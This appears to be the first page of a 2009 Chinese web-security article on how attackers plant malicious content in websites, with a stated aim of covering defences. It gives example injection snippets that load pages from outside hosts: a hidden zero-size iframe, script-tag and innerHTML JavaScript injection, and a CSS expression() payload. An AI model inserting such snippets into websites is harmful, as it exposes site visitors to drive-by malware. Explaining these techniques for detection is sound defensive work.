WEB开发网
开发学院网络安全安全技术 了解常用集中网站挂马和防范方法 阅读

了解常用集中网站挂马和防范方法

 2009-04-08 13:59:13 来源:WEB开发网   
核心提示:1、挂马的N种方法(1) HTML挂马法,常规的HTML挂马方法一般是在网页中插入一条iframe语句,了解常用集中网站挂马和防范方法,像<iframe src=http://www.arthack.org/horse.html width=0 height=0></iframe>,查看站点是否

1、挂马的N种方法

(1) HTML挂马法。

常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.arthack.org/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。

(2) 再隐藏一点的就是js挂马了。

像再原来的网页中写入<script str=http://www.arthack.org/horse.js></script> ,horse里的js写法一般为 document.write(’http://www.arthack.org/horse.html’>;,或者专业一点的写法是 top.document.body.innerHTML = top.document.body.innerHTML + ‘rn<inframe src=http://www.zw361.com/horse.htm/”></iframe>”;。不过第2种写法要注意:是原来的网页种要有body标签。

3) 在 css中挂马。

这个方法就是在css中写入

body {
hytop:expression(top.document.body.innerHTML = top.document.body.innerHTML + ‘rn<iframe src=http://www.xxx.com/horse.html/”></iframe>’);
}

然后在主页中调用这个CSS,代码类似http://www.arthack.org/css.css” rel=”stylesheet” type=”text/css”>这样的。在csdn 中对expression的解释是:IE5及其以后版本支持在CSS中使用expression,用来吧CSS属性和javascript表达式关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。也就是说CSS属性后面可以是一段Javasccript表达式,CSS属性的值等于 javascript表达式计算的结果。在表达式中可以是直接一用元素自身的属性和方法,也可以使用其它浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。整个解释关键点是expression可以在css中引入js语句,所以我们可用于挂马。不过写的语句值可以远程调用,本地不可以。

1 2 3  下一页

Tags:了解 常用 集中

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接